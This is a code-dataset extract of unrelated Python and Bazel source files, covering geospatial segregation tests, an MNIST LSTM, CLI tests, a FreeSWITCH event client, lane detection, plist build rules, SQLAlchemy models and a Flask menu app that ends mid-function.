content
stringlengths 5
1.05M
|
|---|
from libpysal.examples import load_example
import geopandas as gpd
import numpy as np
from segregation.multigroup import MultiDissim
from segregation.dynamics import compute_multiscalar_profile
import quilt3
import pandana as pdna
p = quilt3.Package.browse('osm/metro_networks_8k', "s3://spatial-ucr/")
p['40900.h5'].fetch()
net = pdna.Network.from_hdf5('40900.h5')
def test_multiscalar():
s_map = gpd.read_file(load_example("Sacramento1").get_path("sacramentot2.shp"))
df = s_map.to_crs(s_map.estimate_utm_crs())
profile = compute_multiscalar_profile(
gdf=df,
segregation_index=MultiDissim,
distances=[500, 1000, 1500, 2000],
groups=["HISP", "BLACK", "WHITE"],
)
np.testing.assert_array_almost_equal(
profile.values, [0.4246, 0.4246, 0.4173, 0.4008, 0.3776], decimal=4
)
def test_multiscalar_network():
s_map = gpd.read_file(load_example("Sacramento1").get_path("sacramentot2.shp"))
df = s_map.to_crs(s_map.estimate_utm_crs())
profile = compute_multiscalar_profile(
gdf=df,
segregation_index=MultiDissim,
distances=[500, 1000],
groups=["HISP", "BLACK", "WHITE"],
)
np.testing.assert_array_almost_equal(
profile.values, [0.4247, 0.4246, 0.4173], decimal=4
)
|
import tensorflow as tf
from tensorflow.keras.layers import LSTM, Dense
from tensorflow.keras.callbacks import TensorBoard
from TensorflowLearning.common import deal_label
n_inputs = 28 # 一次传1行,传28个像素
max_time = 28 # 一幅图有28行
lstm_size = 100 # 100个cells
n_classes = 10
batch_size = 100
(train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.mnist.load_data()
train_images, test_images = (train_images / 255.0).reshape([-1, 28, 28]), (test_images / 255.0).reshape([-1, 28, 28])
train_labels, test_labels = deal_label(train_labels), deal_label(test_labels) # shape = [None, 10]
model = tf.keras.models.Sequential([
LSTM(units=lstm_size, batch_input_shape=[None, max_time, n_inputs]),
Dense(units=n_classes, activation='softmax'),
])
model.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=['accuracy'])
callbacks = [TensorBoard(log_dir='./logs/4_1_logs')]
model.fit(train_images, train_labels, batch_size=batch_size, epochs=6, callbacks=callbacks)
score = model.evaluate(test_images, test_labels)
print(score)
|
from click.testing import CliRunner
import packtivity.cli
def test_maincli(tmpdir):
runner = CliRunner()
result = runner.invoke(
packtivity.cli.runcli,
[
"tests/testspecs/localtouchfile.yml",
"-p",
'outputfile="{workdir}/hello.txt"',
"-w",
str(tmpdir),
],
)
assert result.exit_code == 0
assert tmpdir.join("hello.txt").check()
def test_maincli_fail(tmpdir):
runner = CliRunner()
result = runner.invoke(
packtivity.cli.runcli,
[
"tests/testspecs/localtouchfail.yml",
"-p",
'outputfile="{workdir}/hello.txt"',
"-w",
str(tmpdir),
],
)
assert result.exit_code != 0
def test_maincli_async(tmpdir):
runner = CliRunner()
result = runner.invoke(
packtivity.cli.runcli,
[
"tests/testspecs/localtouchfile.yml",
"-p",
'outputfile="{workdir}/hello.txt"',
"-w",
str(tmpdir.join("workdir")),
"-b",
"foregroundasync",
"-x",
str(tmpdir.join("proxy.json")),
"--async",
],
)
assert result.exit_code == 0
assert tmpdir.join("proxy.json").check()
result = runner.invoke(packtivity.cli.checkproxy, [str(tmpdir.join("proxy.json"))])
assert result.exit_code == 0
def test_maincli(tmpdir):
runner = CliRunner()
result = runner.invoke(
packtivity.cli.runcli,
[
"tests/testspecs/localtouchfile.yml",
"-p",
'outputfile="{workdir}/hello.txt"',
"-w",
str(tmpdir),
],
)
assert result.exit_code == 0
assert tmpdir.join("hello.txt").check()
def test_maincli_fail(tmpdir):
runner = CliRunner()
result = runner.invoke(
packtivity.cli.runcli,
[
"tests/testspecs/localtouchfail.yml",
"-p",
'outputfile="{workdir}/hello.txt"',
"-w",
str(tmpdir),
],
)
assert result.exit_code != 0
def test_validatecli_valid(tmpdir):
runner = CliRunner()
result = runner.invoke(
packtivity.cli.validatecli, ["tests/testspecs/noop-test.yml"]
)
assert result.exit_code == 0
def test_validatecli_invalid(tmpdir):
runner = CliRunner()
result = runner.invoke(
packtivity.cli.validatecli, ["tests/testspecs/noop-test-invalid.yml"]
)
assert result.exit_code == 1
|
# Gevent imports
import gevent
from gevent.queue import Queue
import gevent.socket as socket
from gevent.event import Event
import logging
import pprint
import urllib
class NotConnectedError(Exception):
pass
class ESLEvent(object):
def __init__(self, data):
self.parse_data(data)
def parse_data(self, data):
headers = {}
data = urllib.unquote(data)
data = data.strip().split('\n')
last_key = None
value = ''
for line in data:
if ': ' in line:
key, value = line.split(': ', 1)
last_key = key
else:
key = last_key
value += '\n' + line
headers[key.strip()] = value.strip()
self.headers = headers
class InboundESL(object):
def __init__(self, host, port, password):
self.host = host
self.port = port
self.password = password
self.timeout = 5
self._run = True
self._EOL = '\n'
self._commands_sent = []
self._auth_request_event = Event()
self._receive_events_greenlet = None
self._process_events_greenlet = None
self.event_handlers = {}
self.connected = False
self._esl_event_queue = Queue()
self._process_esl_event_queue = True
def connect(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(self.timeout)
self.sock.connect((self.host, self.port))
self.connected = True
self.sock.settimeout(None)
self.sock_file = self.sock.makefile()
self._receive_events_greenlet = gevent.spawn(self.receive_events)
self._process_events_greenlet = gevent.spawn(self.process_events)
self._auth_request_event.wait()
self.authenticate()
def receive_events(self):
buf = ''
while self._run:
try:
data = self.sock_file.readline()
except Exception:
self._run = False
self.connected = False
self.sock.close()
# logging.exception("Error reading from socket.")
break
if not data:
if self.connected:
logging.error("Error receiving data, is FreeSWITCH running?")
self.connected = False
break
# Empty line
if data == self._EOL:
event = ESLEvent(buf)
buf = ''
self.handle_event(event)
continue
buf += data
@staticmethod
def _read_socket(sock, length):
"""Receive data from socket until the length is reached."""
data = sock.read(length)
data_length = len(data)
while data_length < length:
logging.warn(
'Socket should read %s bytes, but actually read %s bytes. '
'Consider increasing "net.core.rmem_default".' %
(length, data_length)
)
# FIXME(italo): if not data raise error
data += sock.read(length - data_length)
data_length = len(data)
return data
def handle_event(self, event):
if event.headers['Content-Type'] == 'auth/request':
self._auth_request_event.set()
elif event.headers['Content-Type'] == 'command/reply':
async_response = self._commands_sent.pop(0)
event.data = event.headers['Reply-Text']
async_response.set(event)
elif event.headers['Content-Type'] == 'api/response':
length = int(event.headers['Content-Length'])
data = self._read_socket(self.sock_file, length)
event.data = data
async_response = self._commands_sent.pop(0)
async_response.set(event)
elif event.headers['Content-Type'] == 'text/disconnect-notice':
self.connected = False
else:
length = int(event.headers['Content-Length'])
data = self._read_socket(self.sock_file, length)
event.parse_data(data)
self._esl_event_queue.put(event)
def process_events(self):
logging.debug('Event Processor Running')
while self._run:
if not self._process_esl_event_queue:
gevent.sleep(1)
continue
try:
event = self._esl_event_queue.get(timeout=1)
except gevent.queue.Empty:
continue
if event.headers.get('Event-Name') == 'CUSTOM':
handlers = self.event_handlers.get(event.headers.get('Event-Subclass'))
else:
handlers = self.event_handlers.get(event.headers.get('Event-Name'))
if not handlers:
continue
for handle in handlers:
try:
handle(event)
except:
logging.exception(
'ESL handler %s raised exception.' %
handle.__name__)
logging.error(pprint.pformat(event.headers))
def send(self, data):
if not self.connected:
raise NotConnectedError()
async_response = gevent.event.AsyncResult()
self._commands_sent.append(async_response)
raw_msg = data + self._EOL*2
self.sock.send(raw_msg)
response = async_response.get()
return response
def authenticate(self):
response = self.send('auth %s' % self.password)
if response.headers['Reply-Text'] != '+OK accepted':
raise ValueError('Invalid password.')
def register_handle(self, name, handler):
if name not in self.event_handlers:
self.event_handlers[name] = []
if handler in self.event_handlers[name]:
return
self.event_handlers[name].append(handler)
def unregister_handle(self, name, handler):
if name not in self.event_handlers:
raise ValueError('No handlers found for event: %s' % name)
self.event_handlers[name].remove(handler)
if not self.event_handlers[name]:
del self.event_handlers[name]
def stop(self):
if self.connected:
self.send('exit')
self._run = False
logging.info("Waiting for receive greenlet exit")
self._receive_events_greenlet.join()
logging.info("Waiting for event processing greenlet exit")
self._process_events_greenlet.join()
if self.connected:
self.sock.close()
self.sock_file.close()
|
import tensorflow as tf
lstm_cell = tf.contrib.rnn.LSTMCell(
256,
state_is_tuple=False,
)
print lstm_cell.zero_state(64,tf.float32)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Lane detection functions
'''
import math
import cv2
import numpy as np
import matplotlib.image as mpimg
from functools import partial
from moviepy.editor import VideoFileClip
def convert_colorspace(img, colorspace='grayscale'):
"""Converts RGB image to another colorspace
Args:
img (numpy.ndarray): input RGB image
colorspace (str, optional): target colorspace
Returns:
numpy.ndarray: converted image
"""
if colorspace == 'grayscale':
cspace_code = cv2.COLOR_RGB2GRAY
elif colorspace == 'hsv':
cspace_code = cv2.COLOR_RGB2HSV
elif colorspace == 'hsl':
cspace_code = cv2.COLOR_RGB2HSL
return cv2.cvtColor(img, cspace_code)
def overlay_mask(img, vertices):
"""Applies masking on image. Only keeps the region of the image defined by the polygon
formed from `vertices`. The rest of the image is set to black.
`vertices` should be a numpy array of integer points.
Args:
img (numpy.ndarray): input image
vertices (numpy.ndarray): vertices of the mask to apply
Returns:
numpy.ndarray: resulting image
"""
# defining a blank mask to start with
mask = np.zeros_like(img)
# defining a 3 channel or 1 channel color to fill the mask with depending on the input image
if len(img.shape) > 2:
channel_count = img.shape[2] # i.e. 3 or 4 depending on your image
ignore_mask_color = (255,) * channel_count
else:
ignore_mask_color = 255
# filling pixels inside the polygon defined by "vertices" with the fill color
cv2.fillPoly(mask, vertices, ignore_mask_color)
# returning the image only where mask pixels are nonzero
masked_image = cv2.bitwise_and(img, mask)
return masked_image
def draw_lines(img, lines, color=[0, 255, 0], thickness=3):
"""Draw lines on the image inplace
Args:
img (numpy.ndarray): input image
lines (list<tuple>): lines to draw on image
color (list<int>, optional): color of lines in RGB
thickness (int, optional): thickness of lines drawn
"""
for x1, y1, x2, y2 in lines:
cv2.line(img, (x1, y1), (x2, y2), color, thickness)
def extrapolate_lines(lines, img_shape, min_slope=0.3):
"""Aggregate detectes lines into two lanes by extrapolation
Args:
lines (list<list<tuple>>): detected lines
img_shape (tuple<int>): image shape
min_slope (float, optional): minimum slope to consider the edge as being part of the lane
Returns:
list<tuple>: list of extrapolated lanes
"""
extrapolated_lines = []
# Store slopes
left_slopes, right_slopes = [], []
left_intercepts, right_intercepts = [], []
ymin = img_shape[0]
for line in lines:
for x1, y1, x2, y2 in line:
slope = (y2 - y1) / (x2 - x1)
intercept = y2 - slope * x2
# Reduce noise for outliers
if min_slope < abs(slope) < math.inf:
# Check if left lane
if slope < 0:
# Double check to avoid noise from other part of the image
if max(x1, x2) < img_shape[1] / 2:
left_slopes.append(slope)
left_intercepts.append(intercept)
else:
if min(x1, x2) > img_shape[1] / 2:
right_slopes.append(slope)
right_intercepts.append(intercept)
ymin = min(ymin, y1, y2)
if len(left_slopes) > 0:
# Average slope and intercept
left_slope = sum(left_slopes) / len(left_slopes)
left_intercept = sum(left_intercepts) / len(left_intercepts)
# Add the extrapolated lane
left = (int((img_shape[0] - left_intercept) / left_slope), img_shape[0],
int((ymin - left_intercept) / left_slope), int(ymin))
extrapolated_lines.append(left)
if len(right_slopes) > 0:
right_slope = sum(right_slopes) / len(right_slopes)
right_intercept = sum(right_intercepts) / len(right_intercepts)
right = (int((img_shape[0] - right_intercept) / right_slope), img_shape[0],
int((ymin - right_intercept) / right_slope), int(ymin))
extrapolated_lines.append(right)
return extrapolated_lines
def hough_lines(img, rho=2, theta=np.pi / 180, threshold=20, min_line_len=5, max_line_gap=25, thickness=3):
"""Perform a Hough transform on img
Args:
img (numpy.ndarray): input image
rho (float, optional): distance resolution in pixels of the Hough grid
theta (float, optional): angular resolution in radians of the Hough grid
threshold (float, optional): minimum number of votes (intersections in Hough grid cell)
min_line_len (int, optional): minimum number of pixels making up a line
max_line_gap (int, optional): maximum gap in pixels between connectable line segments
thickness (int, optional): thickness of lines drawn on resulting image
Returns:
numpy.ndarray: result image
"""
# Hough transform
lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]),
minLineLength=min_line_len, maxLineGap=max_line_gap)
line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)
# Line extrapolation
extrapolated_lines = extrapolate_lines(lines, line_img.shape)
# Image display
draw_lines(line_img, extrapolated_lines, thickness=thickness)
return line_img
def weighted_img(img1, img2, α=0.8, β=1., γ=0.):
"""Interpolate two images into a single one by applying
α * img1 + β * img2 + γ
Args:
img1 (numpy.ndarray[H, W, C]): first image
img2 (numpy.ndarray[H, W, C]): second image
α (float, optional): weight of first image
β (float, optional): weight of second image
γ (float, optional): offset
Returns:
numpy.ndarray: resulting image
"""
return cv2.addWeighted(img2, α, img1, β, γ)
def get_depth_vertices(img_shape, lat_offset=0.08, horizon=(0.55, 0.5), vert_range=(0.62, 0.9)):
"""Compute depth view vertices
Args:
img_shape (tuple<int>): shape of the input image
lat_offset (float, optional): relative lateral offset of the bottom of the mask
horizon (tuple<float>, optional): relative coordinates of apparent horizon
vert_range (tuple<float>, optional): relative range of vertical masking
Returns:
numpy.ndarray: vertices of depth view mask
"""
# Compute cut coordinates
leftcut_min = lat_offset + (1 - vert_range[0]) / (1 - horizon[0]) * (horizon[1] - lat_offset)
leftcut_max = lat_offset + (1 - vert_range[1]) / (1 - horizon[0]) * (horizon[1] - lat_offset)
vertices = np.array([[
(leftcut_max * img_shape[1], vert_range[1] * img_shape[0]),
(leftcut_min * img_shape[1], vert_range[0] * img_shape[0]),
((1 - leftcut_min) * img_shape[1], vert_range[0] * img_shape[0]),
((1 - leftcut_max) * img_shape[1], vert_range[1] * img_shape[0])]], dtype=np.int32)
return vertices
def _process_image(img, colorspace='hsv', thickness=3, canny_low=50, canny_high=150):
"""Compute the lane mask of an input image and overlay it on input image
Args:
img (numpy.ndarray[H, W, C]): input image
colorspace (str, optional): colorspace to use for canny edge detection
thickness (int, optional): thickness of lines on result image
canny_low (int, optional): lower threshold for canny edge detection
canny_high (int, optional): upper threshold for canny edge detection
Returns:
numpy.ndarray[H, W, 3]: lane mask
"""
# Grayscale conversion
cspace_img = convert_colorspace(img, colorspace)
# Gaussian smoothing
smooth_img = cv2.GaussianBlur(cspace_img, (3, 3), 0)
# Colorspace masking
if colorspace == 'hsv':
yellow_low = np.array([0, 100, 100])
yellow_high = np.array([50, 255, 255])
white_low = np.array([20, 0, 180])
white_high = np.array([255, 80, 255])
yellow_mask = cv2.inRange(smooth_img, yellow_low, yellow_high)
white_mask = cv2.inRange(smooth_img, white_low, white_high)
smooth_img = cv2.bitwise_or(yellow_mask, white_mask)
# Canny edge detection
canny_img = cv2.Canny(smooth_img, canny_low, canny_high)
# Apply depth view masking
vertices = get_depth_vertices(img.shape)
masked_edges = overlay_mask(canny_img, vertices)
# Run Hough on edge detected image
# Output "lines" is an array containing endpoints of detected line segments
lane_img = hough_lines(masked_edges, thickness=thickness)
# Overlay result on input image
return weighted_img(img, lane_img)
def process_image(img_path, thickness=3):
"""Read image and detect lanes on it
Args:
img_path (str): input image path
thickness (int, optional): thickness of lines on result image
Returns:
numpy.ndarray[H, W, 3]: input image overlayed with result
"""
img = mpimg.imread(img_path)
return _process_image(img, thickness=thickness)
def process_video(video_path, output_file, thickness=3, write_gif=False):
"""Display lane detection results on input image
Args:
video_path (str): input video path
output_file (str): output video path
thickness (int, optional): thickness of lines on result image
write_gif (bool, optional): should the output be a GIF rather than a video
"""
video = VideoFileClip(video_path)
clip = video.fl_image(partial(_process_image, thickness=thickness))
if write_gif:
file_split = output_file.split('.')
if file_split[-1] != 'gif':
output_file = '.'.join(file_split[:-1] + ['gif'])
clip.write_gif(output_file, fps=5, program='ImageMagick')
else:
clip.write_videofile(output_file, audio=False)
|
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Plist related actions."""
load(
"@build_bazel_apple_support//lib:apple_support.bzl",
"apple_support",
)
load(
"@build_bazel_rules_apple//apple/internal:intermediates.bzl",
"intermediates",
)
load(
"@build_bazel_rules_apple//apple/internal:platform_support.bzl",
"platform_support",
)
load(
"@build_bazel_rules_apple//apple:providers.bzl",
"AppleBundleVersionInfo",
)
load(
"@bazel_skylib//lib:paths.bzl",
"paths",
)
load(
"@bazel_skylib//lib:shell.bzl",
"shell",
)
def plisttool_action(
*,
actions,
control_file,
inputs,
mnemonic = None,
outputs,
platform_prerequisites,
resolved_plisttool):
"""Registers an action that invokes `plisttool`.
This function is a low-level helper that simply invokes `plisttool` with the given arguments.
It is intended to be called by other functions that register actions for more specific
resources, like Info.plist files or entitlements.
Args:
actions: The actions provider from `ctx.actions`.
control_file: The `File` containing the control struct to be passed to plisttool.
inputs: Any `File`s that should be treated as inputs to the underlying action.
mnemonic: The mnemonic to display when the action executes. Defaults to None.
outputs: Any `File`s that should be treated as outputs of the underlying action.
platform_prerequisites: Struct containing information on the platform being targeted.
resolved_plisttool: A struct referencing the resolved plist tool.
"""
apple_support.run(
actions = actions,
apple_fragment = platform_prerequisites.apple_fragment,
arguments = [control_file.path],
executable = resolved_plisttool.executable,
inputs = depset(inputs + [control_file], transitive = [resolved_plisttool.inputs]),
input_manifests = resolved_plisttool.input_manifests,
mnemonic = mnemonic,
outputs = outputs,
xcode_config = platform_prerequisites.xcode_version_config,
xcode_path_wrapper = platform_prerequisites.xcode_path_wrapper,
)
def compile_plist(*, actions, input_file, output_file, platform_prerequisites):
"""Creates an action that compiles plist and strings files.
Args:
actions: The actions provider from `ctx.actions`.
input_file: The property list file that should be converted.
output_file: The file reference for the output plist.
platform_prerequisites: Struct containing information on the platform being targeted.
"""
if input_file.basename.endswith(".strings"):
mnemonic = "CompileStrings"
else:
mnemonic = "CompilePlist"
# This command will check whether the input file is non-empty, and then
# execute the version of plutil that takes the file directly. If the file is
# empty, it will echo an new line and then pipe it into plutil. We do this
# to handle empty files as plutil doesn't handle them very well.
plutil_command = "plutil -convert binary1 -o %s --" % shell.quote(output_file.path)
complete_command = ("if [[ -s {in_file} ]] ; then {plutil_command} {in_file} ; " +
"elif [[ -f {in_file} ]] ; then echo | {plutil_command} - ; " +
"else exit 1 ; " +
"fi").format(
in_file = shell.quote(input_file.path),
plutil_command = plutil_command,
)
apple_support.run_shell(
actions = actions,
apple_fragment = platform_prerequisites.apple_fragment,
command = complete_command,
inputs = [input_file],
mnemonic = mnemonic,
outputs = [output_file],
xcode_config = platform_prerequisites.xcode_version_config,
)
def merge_resource_infoplists(
*,
actions,
bundle_name_with_extension,
input_files,
output_plist,
platform_prerequisites,
resolved_plisttool,
rule_label):
"""Merges a list of plist files for resource bundles with substitutions.
Args:
actions: The actions provider from `ctx.actions`.
bundle_name_with_extension: The full name of the bundle where the plist will be placed.
input_files: The list of plists to merge.
output_plist: The file reference for the output plist.
platform_prerequisites: Struct containing information on the platform being targeted.
resolved_plisttool: A struct referencing the resolved plist tool.
rule_label: The label of the target being analyzed.
"""
product_name = paths.replace_extension(bundle_name_with_extension, "")
substitutions = {
"BUNDLE_NAME": bundle_name_with_extension,
"PRODUCT_NAME": product_name,
"TARGET_NAME": product_name,
}
# The generated Info.plists from Xcode's project templates use
# DEVELOPMENT_LANGUAGE as the default variable substitution for
# CFBundleDevelopmentRegion. We substitute this to `en` to support
# Info.plists out of the box coming from Xcode.
substitutions["DEVELOPMENT_LANGUAGE"] = "en"
target = '%s (while bundling under "%s")' % (bundle_name_with_extension, str(rule_label))
control = struct(
binary = True,
output = output_plist.path,
plists = [p.path for p in input_files],
target = target,
variable_substitutions = struct(**substitutions),
)
control_file = intermediates.file(
actions,
rule_label.name,
paths.join(bundle_name_with_extension, "%s-control" % output_plist.basename),
)
actions.write(
output = control_file,
content = control.to_json(),
)
plisttool_action(
actions = actions,
control_file = control_file,
inputs = input_files,
mnemonic = "CompileInfoPlist",
outputs = [output_plist],
platform_prerequisites = platform_prerequisites,
resolved_plisttool = resolved_plisttool,
)
def merge_root_infoplists(
*,
actions,
bundle_name,
bundle_id = None,
bundle_extension,
executable_name,
child_plists = [],
child_required_values = [],
environment_plist,
include_executable_name = True,
input_plists,
launch_storyboard,
output_plist,
output_pkginfo,
platform_prerequisites,
resolved_plisttool,
rule_descriptor,
rule_label,
version,
version_keys_required = False):
"""Creates an action that merges Info.plists and converts them to binary.
This action merges multiple plists by shelling out to plisttool, then
compiles the final result into a single binary plist file.
Args:
actions: The actions provider from `ctx.actions`.
bundle_name: The name of the output bundle.
bundle_id: The bundle identifier to set in the output plist.
bundle_extension: The extension for the bundle.
executable_name: The name of the output executable.
child_plists: A list of plists from child targets (such as extensions
or Watch apps) whose bundle IDs and version strings should be
validated against the compiled plist for consistency.
child_required_values: A list of pairs containing a client target plist
and the pairs to check. For more information on the second item in the
pair, see plisttool's `child_plist_required_values`, as this is passed
straight through to it.
environment_plist: An executable file referencing the environment_plist tool.
include_executable_name: If True, the executable name will be added to
the plist in the `CFBundleExecutable` key. This is mainly intended for
plists embedded in a command line tool which don't need this value.
input_plists: The root plist files to merge.
launch_storyboard: A file to be used as a launch screen for the application.
output_pkginfo: The file reference for the PkgInfo file. Can be None if not
required.
output_plist: The file reference for the merged output plist.
platform_prerequisites: Struct containing information on the platform being targeted.
resolved_plisttool: A struct referencing the resolved plist tool.
rule_descriptor: A rule descriptor for platform and product types from the rule context.
rule_label: The label of the target being analyzed.
version: A label referencing AppleBundleVersionInfo, if provided by the rule.
version_keys_required: If True, the merged Info.plist file must include
entries for CFBundleShortVersionString and CFBundleVersion.
"""
input_files = list(input_plists + child_plists)
# plists and forced_plists are lists of plist representations that should be
# merged into the final Info.plist. Values in plists will be validated to be
# unique, while values in forced_plists are forced into the final Info.plist,
# without validation. Each array can contain either a path to a plist file to
# merge, or a struct that represents the values of the plist to merge.
plists = [p.path for p in input_plists]
forced_plists = []
# plisttool options for merging the Info.plist file.
info_plist_options = {}
bundle_name_with_extension = bundle_name + bundle_extension
product_name = paths.replace_extension(bundle_name_with_extension, "")
# Values for string replacement substitutions to perform in the merged
# Info.plist
substitutions = {
"BUNDLE_NAME": bundle_name_with_extension,
"PRODUCT_NAME": product_name,
}
# The default in Xcode is for PRODUCT_NAME and TARGET_NAME to be the same.
# Support TARGET_NAME for substitutions even though it might not be the
# target name in the BUILD file.
substitutions["TARGET_NAME"] = product_name
# The generated Info.plists from Xcode's project templates use
# DEVELOPMENT_LANGUAGE as the default variable substitution for
# CFBundleDevelopmentRegion. We substitute this to `en` to support
# Info.plists out of the box coming from Xcode.
substitutions["DEVELOPMENT_LANGUAGE"] = "en"
if include_executable_name and executable_name:
substitutions["EXECUTABLE_NAME"] = executable_name
forced_plists.append(struct(CFBundleExecutable = executable_name))
if bundle_id:
substitutions["PRODUCT_BUNDLE_IDENTIFIER"] = bundle_id
# Pass the bundle_id as a plist and not a force_plist, this way the
# merging will validate that any existing value matches. Historically
# mismatches between the input Info.plist and rules bundle_id have
# been valid bugs, so this will still catch that.
plists.append(struct(CFBundleIdentifier = bundle_id))
if child_plists:
info_plist_options["child_plists"] = struct(
**{str(p.owner): p.path for p in child_plists}
)
if child_required_values:
info_plist_options["child_plist_required_values"] = struct(
**{str(p.owner): v for (p, v) in child_required_values}
)
if (version != None and AppleBundleVersionInfo in version):
version_info = version[AppleBundleVersionInfo]
input_files.append(version_info.version_file)
info_plist_options["version_file"] = version_info.version_file.path
if version_keys_required:
info_plist_options["version_keys_required"] = True
# Keys to be forced into the Info.plist file.
# b/67853874 - move this to the right platform specific rule(s).
if launch_storyboard:
short_name = paths.split_extension(launch_storyboard.basename)[0]
forced_plists.append(struct(UILaunchStoryboardName = short_name))
# Add any UIDeviceFamily entry needed.
families = platform_support.ui_device_family_plist_value(
platform_prerequisites = platform_prerequisites,
)
if families:
forced_plists.append(struct(UIDeviceFamily = families))
# Collect any values for special product types that we have to manually put
# in (duplicating what Xcode apparently does under the hood).
if rule_descriptor.additional_infoplist_values:
forced_plists.append(
struct(**rule_descriptor.additional_infoplist_values),
)
# Replace PRODUCT_BUNDLE_PACKAGE_TYPE based on info in rule descriptor
if rule_descriptor.bundle_package_type:
substitutions["PRODUCT_BUNDLE_PACKAGE_TYPE"] = rule_descriptor.bundle_package_type
if platform_prerequisites.platform_type == apple_common.platform_type.macos:
plist_key = "LSMinimumSystemVersion"
else:
plist_key = "MinimumOSVersion"
input_files.append(environment_plist)
platform = platform_prerequisites.platform
sdk_version = platform_prerequisites.sdk_version
platform_with_version = platform.name_in_plist.lower() + str(sdk_version)
forced_plists.extend([
environment_plist.path,
struct(
CFBundleSupportedPlatforms = [platform.name_in_plist],
DTPlatformName = platform.name_in_plist.lower(),
DTSDKName = platform_with_version,
**{plist_key: platform_prerequisites.minimum_os}
),
])
output_files = [output_plist]
if output_pkginfo:
info_plist_options["pkginfo"] = output_pkginfo.path
output_files.append(output_pkginfo)
control = struct(
binary = rule_descriptor.binary_infoplist,
forced_plists = forced_plists,
info_plist_options = struct(**info_plist_options),
output = output_plist.path,
plists = plists,
target = str(rule_label),
variable_substitutions = struct(**substitutions),
)
control_file = intermediates.file(
actions,
rule_label.name,
"%s-root-control" % output_plist.basename,
)
actions.write(
output = control_file,
content = control.to_json(),
)
plisttool_action(
actions = actions,
control_file = control_file,
inputs = input_files,
mnemonic = "CompileRootInfoPlist",
outputs = output_files,
platform_prerequisites = platform_prerequisites,
resolved_plisttool = resolved_plisttool,
)
|
# Programa que quando informado a medida em metros retorne ela em: km, hm, dam, dm, cm, mm
try:
medida = float(input("Informe a medida em Metros: "))
print(f"Em km: {medida/1000}km")
print(f"Em hm: {medida/100}hm")
print(f"Em dam: {medida/10}dam")
print(f"Em dm: {medida*10}dm")
print(f"Em cm: {medida*100}cm")
print(f"Em mm: {medida*1000}mm")
except Exception as erro:
print(f"Ocorreu um erro! Tente novamente! Tipo do erro: {erro.__class__}")
|
# I made an external file so to be able to add features when needed.
from lib.server import hcX
if __name__ == '__main__':
# run the server..
hcX.main()
|
import uuid
from sqlalchemy import Column, DateTime, ForeignKey, String, UniqueConstraint, func
from sqlalchemy.orm import backref, relationship
from quetz.db_models import UUID, Base
class TermsOfService(Base):
__tablename__ = 'quetz_tos'
id = Column(UUID, primary_key=True, default=lambda: uuid.uuid4().bytes)
uploader_id = Column(UUID)
filename = Column(String)
time_created = Column(DateTime, nullable=False, server_default=func.now())
class TermsOfServiceSignatures(Base):
__tablename__ = "quetz_tos_signatures"
__table_args__ = (UniqueConstraint('tos_id', 'user_id'),)
tos_id = Column(UUID, ForeignKey('quetz_tos.id'), primary_key=True)
user_id = Column(UUID, ForeignKey('users.id'), primary_key=True)
time_created = Column(DateTime, nullable=False, server_default=func.now())
tos = relationship(
"TermsOfService",
backref=backref(
"tos",
uselist=False,
cascade="delete,all",
),
)
|
from sqlalchemy import Column, Integer, String, Boolean
from common.base import Base
class Tile(Base):
__tablename__ = 'tile'
id = Column(Integer, primary_key=True)
name = Column(String)
display_emoji = Column(String)
interactive = Column(Boolean, default=False)
traversable = Column(Boolean, default=True)
hunger_drain_amount = Column(Integer, default=0)
thirst_drain_amount = Column(Integer, default=0)
can_chop = Column(Boolean, default=False)
can_mine = Column(Boolean, default=False)
can_hunt = Column(Boolean, default=False)
can_forage = Column(Boolean, default=False)
|
from flask import Flask, render_template, request, redirect, url_for, flash, jsonify
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Base, Restaurant, MenuItem
app = Flask(__name__)
# engine = create_engine('sqlite:///restaurantmenu.db?check_same_thread=False')
DIALCT = "mysql"
DRIVER = "pymysql"
USERNAME = "root"
PASSWORD = ""
HOST = "127.0.0.1"
PORT = "3306"
DATABASE = "test"
DB_URI="{}+{}://{}:{}@{}:{}/{}?charset=utf8".format(DIALCT,DRIVER,USERNAME,PASSWORD,HOST,PORT,DATABASE)
engine = create_engine(DB_URI)
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
@app.route('/restaurants/<int:restaurant_id>/menu/JSON')
def restaurantMenu_JSON(restaurant_id):
restaurant = session.query(Restaurant).filter_by(id=restaurant_id).one()
items = session.query(MenuItem).filter_by(restaurant_id=restaurant_id).all()
return jsonify(MenuItems=[i.serialize for i in items])
@app.route('/restaurants/<int:restaurant_id>/menu/<int:menu_id>/JSON')
def Menu_Item_JSON(restaurant_id, menu_id):
items = session.query(MenuItem).filter_by(id=menu_id).one()
return jsonify(MenuItems=items.serialize)
@app.route('/')
@app.route('/restaurants/<int:restaurant_id>/menu')
def restaurantMenu(restaurant_id):
restaurant = session.query(Restaurant).first()
items = session.query(MenuItem).filter_by(restaurant_id=restaurant.id)
return render_template('menu.html', restaurant=restaurant, items=items)
@app.route('/restaurants/<int:restaurant_id>/new', methods=['GET', 'POST'])
def new_Menu_Item(restaurant_id):
if request.method == 'POST':
new_item = MenuItem(name = request.form['name'], restaurant_id = restaurant_id)
session.add(new_item)
session.commit()
flash("new menu item created!")
return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))
else:
return render_template('newmenuitem.html', restaurant_id=restaurant_id)
@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/edit', methods=['GET', 'POST'])
def edit_Menu_Item(restaurant_id, menu_id):
editedItem = session.query(MenuItem).filter_by(id=menu_id).one()
if request.method == 'POST':
if request.form['description']:
editedItem.description = request.form['description']
if request.form['price']:
editedItem.price = request.form['price']
session.add(editedItem)
session.commit()
flash("menu item edited!")
return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))
else:
